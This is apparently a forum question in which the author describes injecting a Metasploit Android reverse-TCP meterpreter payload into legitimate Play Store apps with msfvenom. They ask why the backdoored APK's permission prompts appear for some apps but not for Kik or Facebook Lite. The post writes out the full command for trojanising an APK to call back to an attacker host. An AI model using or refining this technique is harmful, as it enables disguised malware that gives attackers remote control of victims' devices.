When injecting payloads into existing apk files, I’ve noticed that sometimes the permissions written to the AndroidManifest.xml file are not always read.
I would have downloaded an apk file off Google Play and then run the following command:
msfvenom -x test.apk -p android/meterpreter/reverse_tcp LHOST=my_host LPORT=my_port -o exploited-test.apk
The following command has worked for the app called “Pixel Dungeon”, and the following permission screen came up as expected: Image
However, it has not worked on apps like Kik, b612 camera filter, facebook lite and some others. I get the following screen when trying it on Kik: Image
Does it have to do with the fact that these apps are more secure or running on a version of android that uses a different permissions model?
Exploited Machine: Samsung Galaxy Tab SMT-530
apktool version: 2.4.0
Metasploit Framework: 5.0.28-dev
Not sure of any other version info that I can leave to help address the issue